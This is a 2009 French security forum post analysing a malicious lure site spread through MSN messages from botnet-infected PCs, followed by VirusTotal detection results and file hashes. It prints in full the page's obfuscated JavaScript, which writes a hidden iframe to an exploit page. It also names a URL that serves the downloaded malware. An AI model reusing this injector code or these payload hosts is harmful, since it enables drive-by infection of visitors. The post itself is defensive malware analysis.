http://www.face-book.cc

par **Malekal_morte** » 11 oct. 2009 16:58

Message envoyé aux contacts MSN par les PC infectés (PC Zombit/botnet) :

hahaha http://www.face-book.cc

La page contient un Javascript offusqué :

Code : Tout sélectionner

<script language=JavaScript>var byA043 = '%3C%69%66';var ijrepN3qidn8eD683h4gthL1YuO0d34 = '%72';var ixfuupWOpe9017mdZetE = 
'%61%6D%65%20%6E%61%6D%65%3D%22';var zamquZk1tdWyyB = 
'%7A%6E%62%31%77%54%34%68%58%35%66%79%71%54%59%77%6D%67%6C%68%65%6F%62%61%65%62%31%6B%35%66%75';var l58uk = 
'%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%30%22';var wwxtP42hEwt108y9vT57q7irqLL21 = '%73%72%63%3D%22';var hF9Ao4e8HY6o9jHAihCZu1 
= '%68%74%74%70%3A%2F%2F';var etnv0wNlUuzy = 'pornicari.com/test';var s9j8XFEBblPrjQip = 
'%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%31%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%22%20%74%69%74%6C%65%3D%22';var 
hhjvj9ZwyoRdb4Y1hl7t94b9 = '%6F%7A%32%34%45%37%69%78%36%31%73%59%64%71%72%6E%69%75';var eLapihd = 
'%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%62%6F%72%64%65%72%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E';var 
rERB3oJ9h9bDo8ezQEaZunkc7 = '%3C%69%66';var treLSta8pb4qI = '%72%61';var ruin1Etg7L7n1q2pvBy570Oab7aTA0F = '%6D%65%3E';var dJn71uhc730qgG6Tm3d0vU=new 
Array();dJn71uhc730qgG6Tm3d0vU[0]=new 
Array(byA043+ijrepN3qidn8eD683h4gthL1YuO0d34+ixfuupWOpe9017mdZetE+zamquZk1tdWyyB+l58uk+wwxtP42hEwt108y9vT57q7irqLL21+hF9Ao4e8HY6o9jHAihCZu1+etnv0wNlUuzy+s9j8XFEBblPrjQip+hhjvj9ZwyoRdb4Y1hl7t94b9+eLapihd+rERB3oJ9h9bDo8ezQEaZunkc7+treLSta8pb4qI+ruin1Etg7L7n1q2pvBy570Oab7aTA0F);dmSp2q4leMY4i4mhrpdelW=unescape(dJn71uhc730qgG6Tm3d0vU);document.write(dmSp2q4leMY4i4mhrpdelW);</script>

Ceci conduit à des expoitations de vulnérabilités pour télécharger et exécuter automatiquement le malware :

Code : Tout sélectionner

http://balkan-hosting.net/%7Evoider/bfallen/load.php

Scan du fichier sur VirusTotal : http://www.virustotal.com/analisis/429c ... 1255272602

File exe.exe received on 2009.10.11 14:50:02 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 5/40 (12.5%)

Antivirus Version Last Update Result
a-squared 4.5.0.41 2009.10.11 -
AhnLab-V3 5.0.0.2 2009.10.10 -
AntiVir 7.9.1.35 2009.10.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2009.10.10 -
Authentium 5.1.2.4 2009.10.10 -
Avast 4.8.1351.0 2009.10.11 -
AVG 8.5.0.420 2009.10.04 -
BitDefender 7.2 2009.10.11 -
CAT-QuickHeal 10.00 2009.10.10 -
ClamAV 0.94.1 2009.10.10 -
Comodo 2572 2009.10.11 -
DrWeb 5.0.0.12182 2009.10.11 -
eSafe 7.0.17.0 2009.10.08 -
eTrust-Vet 35.1.7060 2009.10.09 -
F-Prot 4.5.1.85 2009.10.10 -
F-Secure 8.0.14470.0 2009.10.11 Suspicious:W32/Malware!Gemini
Fortinet 3.120.0.0 2009.10.11 -
GData 19 2009.10.11 -
Ikarus T3.1.1.72.0 2009.10.11 -
Jiangmin 11.0.800 2009.10.08 -
K7AntiVirus 7.10.867 2009.10.10 -
Kaspersky 7.0.0.125 2009.10.11 -
McAfee 5767 2009.10.10 -
McAfee+Artemis 5767 2009.10.10 -
McAfee-GW-Edition 6.8.5 2009.10.11 Trojan.Crypt.ZPACK.Gen
Microsoft 1.5101 2009.10.11 VirTool:Win32/Obfuscator.FL
NOD32 4497 2009.10.11 -
Norman 6.01.09 2009.10.11 -
nProtect 2009.1.8.0 2009.10.11 -
Panda 10.0.2.2 2009.10.11 -
PCTools 4.4.2.0 2009.10.11 -
Rising 21.50.60.00 2009.10.11 -
Sophos 4.45.0 2009.10.11 -
Sunbelt 3.2.1858.2 2009.10.10 -
Symantec 1.4.4.12 2009.10.11 Packed.Generic.255
TheHacker 6.5.0.2.036 2009.10.10 -
TrendMicro 8.950.0.1094 2009.10.11 -
VBA32 3.12.10.11 2009.10.10 -
ViRobot 2009.10.9.1978 2009.10.09 -
VirusBuster 4.6.5.0 2009.10.10 -
Additional information
File size: 118272 bytes
MD5...: 06a23a3e6a7f67eac9a87e1b2ff63400
SHA1..: 04fbb84d16ade0a15b915b3cb9295d27a18a53f4